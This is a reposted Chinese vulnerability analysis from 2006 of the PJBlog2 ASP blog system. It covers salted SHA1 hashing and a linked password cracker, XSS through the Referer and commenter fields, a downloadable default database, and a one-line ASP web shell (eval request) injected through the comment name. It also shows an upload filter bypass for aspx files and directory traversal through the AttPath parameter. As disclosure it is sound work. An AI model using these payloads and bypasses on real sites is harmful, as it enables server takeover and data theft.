分享
 
 
 

PJBlog安全性分析

王朝other·作者佚名  2006-05-27
窄屏简体版  字體: |||超大  

Author:lake2,http://lake2.0x54.org

Date:2006-1-1

PJBlog2是PuterJam开发的一款免费的ASP + Access的个人blog系统,这几天偶想弄个blog来玩玩,经过比较选中了功能、界面都相对较好的PJBlog2。经过试用,感觉这blog还不错,也发现几个安全方面的小问题,就把我的一点点见解发出来。我分析的版本是05年12月11日发布的PJBlog2 v2.4.1211版本。

一、 密码加密算法

PJBlog2没有采用常用的MD5算法对用户密码加密,而是使用的SHA1算法。SHA1算法跟MD5类似,也是单向散列函数,不过它对任意长度的数据进行处理输出160位的数值。

PJBlog2在创建新用户的时候会随机生成一个6位的字符串Salt,用户的明文密码加上这个Salt值再进行hash才得到加密后的密码。即:Password = SHA1(user_pwd & Salt)。这样子做的好处是即使两个一样的密码hash后的结果也完全不同。这个稍微“另类”的算法给破解密码带来了点难度。

呵呵,有难度不等于不能破解,网上没有现成的程序,需要自己动手写个才是。因为.NET提供了SHA1的类所以最初用VB.Net写的,由于狂耗资源的问题一直解决不了,只好换C了。用C实现SHA1的源代码我找了好久才在一个老外的站找到,还不错,呵呵,有兴趣的可以看下老外的SHA1类:http://www.codeproject.com/cpp/csha1.asp

程序可以在这里( http://www.0x54.org/lake2/program/PJBlogCracker.exe )下载,是命令行下的,功能比较弱,单线程速度超级慢,可能还有bug,诸多问题以后再改咯。

二、 登陆认证

PJBlog2的认证方式是用的Cookies加IP。当用户登陆成功,系统随机产生一个Hashkey写入Cookies并记录到数据库中,然后通过Cookies里的Hashkey、Username还有IP来判断用户。Cookies好办,可以用跨站、下数据库等方式拿,可以这IP就难办了,看来进行Cookies欺骗的可能性很小啊。呵呵,那就不看这个咯。

三、 几个地方过滤不严

第一个就是统计访问的referer过滤不严。看:

Guest_Refer=Trim(Request.ServerVariables("HTTP_REFERER"))

Conn.ExeCute("INSERT INTO blog_Counter(coun_IP,coun_OS,coun_Browser,coun_Referer) VALUES ('"&Guest_IP&"','"&Guest_Browser(1)&"','"&Guest_Browser(0)&"','"&CheckStr(Guest_Refer)&"')")

呵呵,只是把referer过滤后用CheckStr检查之,看CheckStr代码:

'*************************************

'过滤特殊字符

'*************************************

Function CheckStr(byVal ChkStr)

Dim Str:Str=ChkStr

Str=Trim(Str)

If IsNull(Str) Then

CheckStr = ""

Exit Function

End If

Str = Replace(Str, "&", "&")

Str = Replace(Str,"'","'")

Str = Replace(Str,"""",""")

Dim re

Set re=new RegExp

re.IgnoreCase =True

re.Global=True

re.Pattern="(w)(here)"

Str = re.replace(Str,"$1here")

re.Pattern="(s)(elect)"

Str = re.replace(Str,"$1elect")

re.Pattern="(i)(nsert)"

Str = re.replace(Str,"$1nsert")

re.Pattern="(c)(reate)"

Str = re.replace(Str,"$1reate")

re.Pattern="(d)(rop)"

Str = re.replace(Str,"$1rop")

re.Pattern="(a)(lter)"

Str = re.replace(Str,"$1lter")

re.Pattern="(d)(elete)"

Str = re.replace(Str,"$1elete")

re.Pattern="(u)(pdate)"

Str = re.replace(Str,"$1pdate")

re.Pattern="(\s)(or)"

Str = re.replace(Str,"$1or")

Set re=Nothing

CheckStr=Str

End Function

过滤了单引号、双引号、连接符等,不过最重要的“<”和“>”却没有过滤。呵呵,跨站脚本攻击又有用武之地了。注意只显示前面40个字符在页面,要好好构造哦。

第二就是游客评论输入用户名也是用的CheckStr过滤,用户名数据库有限制,24个字符,这里构造CSS就更有难度了,不过可以有别的用处,具体的嘛,呵呵,后文详述。

有些blog主人禁止了游客评论,所以就只好注册后再评论了,但是注册后评论的名字文本框被设成了注册名而且只读,怎么办?呵呵,没关系,可以外部提交数据的。

再一个就是blog的留言板插件,还是用户名没过滤好,这个更难利用,只有20个字符哦。

四、 数据库的问题

PJBlog2的默认数据库名为pblog.asp,虽然数据库里面有个貌似防下载的blog_Notdownload表,呵呵,访问数据库试试,可以下载的哦。

既然可以下载,当然可以插入asp代码运行咯。有些地方(比如游客评论内容)插入asp代码会被扯开,不知道原因,郁闷。

经测试评论的姓名里是可以插ASP代码的。前面说了这里过滤不严,这样插入数据库的asp不会被显示出来的,看到的只是个没名字的家伙在唧唧歪歪,呵呵。这个可要好好构造哦,24个字符而且"被过滤了,想了一下,正好找到一个最短的,恰好24个字符:<%eval request(chr(9))%>

留言版的内容也可以插入asp代码,不过管理员看留言时看得到的哦。

呵呵,当然大多数站长应该都是改了数据库名称的,但是测试时还是发现少数人不改……

五、 上传文件

出于安全的考虑,PJBlog2限制了上传文件类型,包括asp、asa、aspx、cer、cdx、htr。其实现在很多虚拟主机不仅支持asp,还会支持aspx、php、perl的,而且也可以上传shtml等格式,所以如果既然要限制最好是把所有服务器执行文件的类型一起限制才是。

上传文件这里还有点问题,看attachment.asp里的代码:

Dim F_File,F_Type

Set F_File=FileUP.File("File")

F_Name=randomStr(1)&Year(now)&Month(now)&Day(now)&Hour(now)&Minute(now)&Second(now)&"."&F_File.FileExt

F_Type=FixName(F_File.FileExt)

IF F_File.FileSize > Int(UP_FileSize) Then

Response.Write("<div style=""padding:6px""><a href='attachment.asp'>文件大小超出,请返回重新上传</a></div>")

ElseIF IsvalidFile(UCase(F_Type)) = False Then

Response.Write("<div style=""padding:6px""><a href='attachment.asp'>文件格式非法,请返回重新上传</a></div>" )

Else

F_File.SaveAs Server.MapPath("attachments/"&D_Name&"/"&F_Name)

response.write "<script>addUploadItem('"&F_Type&"','attachments/"&D_Name&"/"&F_Name&"',"&Request.QueryString("MSave")&")</script>"

Response.Write("<div style=""padding:6px""><a href='attachment.asp'>文件上传成功,请返回继续上传</a></div>")

End IF

保存文件的后缀是F_File.FileExt,而检查的是经过FixName()函数处理的后缀,那就看看fixname函数定义,在function.asp中:

'*************************************

'过滤文件名字

'*************************************

Function FixName(UpFileExt)

If IsEmpty(UpFileExt) Then Exit Function

FixName = Ucase(UpFileExt)

FixName = Replace(FixName,Chr(0),"")

FixName = Replace(FixName,".","")

FixName = Replace(FixName,"ASP","")

FixName = Replace(FixName,"ASA","")

FixName = Replace(FixName,"ASPX","")

FixName = Replace(FixName,"CER","")

FixName = Replace(FixName,"CDX","")

FixName = Replace(FixName,"HTR","")

End Function

呵呵,它把危险后缀过滤了的,如果我的文件后缀是asp(0x00)gif,那么检查的时候过滤chr(0)和asp,后缀就成了gif,通过,保存的时候就是asp(0x00)gif。从理论上来说是对的啊,我搞了半天也不行,郁闷。有知道的大侠告诉我啊。

不过我们可以利用这个上传aspx格式。呵呵,我们上传aspx文件,fixname函数过滤asp,于是后缀就成了x。只要把x设为可以上传的格式,就可以传aspx文件了。

六、 附件管理问题

管理员登陆后有个附件管理功能,看他参数类似于http://localhost/blog/ConContent.asp?Fmenu=SQLFile&Smenu=Attachments&AttPath=attachments/month_0512,可以通过指定AttPath浏览web目录的哦。

但是系统限制了站外提交数据,所以不能直接改url,那就“曲线救国”吧。找到友情链接添加功能,url就填上我们构造的url,保存,然后点查看,就绕过站外的限制了。注意构造的AttPath的第一个字符不能是“.”和“/”哦,程序有检查的。我们这样构造就可以跳到blog根目录:http://localhost/blog/ConContent.asp?Fmenu=SQLFile&Smenu=Attachments&AttPath=attachments/..

呵呵,最后还是希望大家支持PJBlog2,真的是很好用的啊。希望作者再接再厉,把这套blog系统做得更好,造福众多网民J

PS:作者真是勤快啊,补丁已经出来了,呵呵

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有